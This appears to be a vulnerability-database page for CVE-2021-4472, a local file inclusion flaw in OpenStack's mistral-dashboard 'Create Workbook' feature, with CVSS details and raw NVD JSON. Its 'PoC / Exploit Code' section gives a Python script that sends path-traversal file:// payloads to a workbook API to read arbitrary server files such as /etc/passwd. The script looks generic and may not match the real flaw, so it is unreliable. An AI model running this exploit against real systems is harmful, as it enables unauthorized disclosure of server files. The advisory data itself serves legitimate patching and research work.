Security Vulnerability Report
中文
CVE-2021-4472 CVSS 6.5 MEDIUM

CVE-2021-4472

Published: 2025-11-26 19:15:46
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The mistral-dashboard plugin for openstack has a local file inclusion vulnerability through the 'Create Workbook' feature that may result in disclosure of arbitrary local files content.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

OpenStack Mistral-dashboard < 修复版本
OpenStack python-mistralclient < 修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2021-4472 PoC - Local File Inclusion in OpenStack Mistral-dashboard # Target: OpenStack Mistral-dashboard 'Create Workbook' feature def exploit_lfi(target_url, token, file_path): """ Exploit Local File Inclusion vulnerability in mistral-dashboard """ headers = { 'X-Auth-Token': token, 'Content-Type': 'application/json' } # Malicious payload with path traversal payload = { 'name': 'test_workbook', 'definition': f'file://{file_path}' # Path traversal payload } endpoint = f'{target_url}/api/mistral/workbooks' try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f'[+] Successfully read file: {file_path}') print(response.text) return True else: print(f'[-] Failed with status: {response.status_code}') return False except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 5: print('Usage: python cve-2021-4472.py <target_url> <token> <file_path>') print('Example: python cve-2021-4472.py https://openstack.example.com/token/etc/passwd') sys.exit(1) target = sys.argv[1] token = sys.argv[2] file_path = '../../../' + sys.argv[3] # Path traversal exploit_lfi(target, token, file_path)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-4472", "sourceIdentifier": "[email protected]", "published": "2025-11-26T19:15:46.387", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mistral-dashboard plugin for openstack has a local file inclusion vulnerability through the 'Create Workbook' feature that may result in disclosure of arbitrary local files content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2021-4472", "source": "[email protected]"}, {"url": "https://bugs.launchpad.net/horizon/+bug/1931558", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2417321", "source": "[email protected]"}, {"url": "https://review.opendev.org/c/openstack/mistral-dashboard/+/800952", "source": "[email protected]"}, {"url": "https://review.opendev.org/c/openstack/python-mistralclient/+/800950", "source": "[email protected]"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/12/msg00002.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/12/msg00003.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.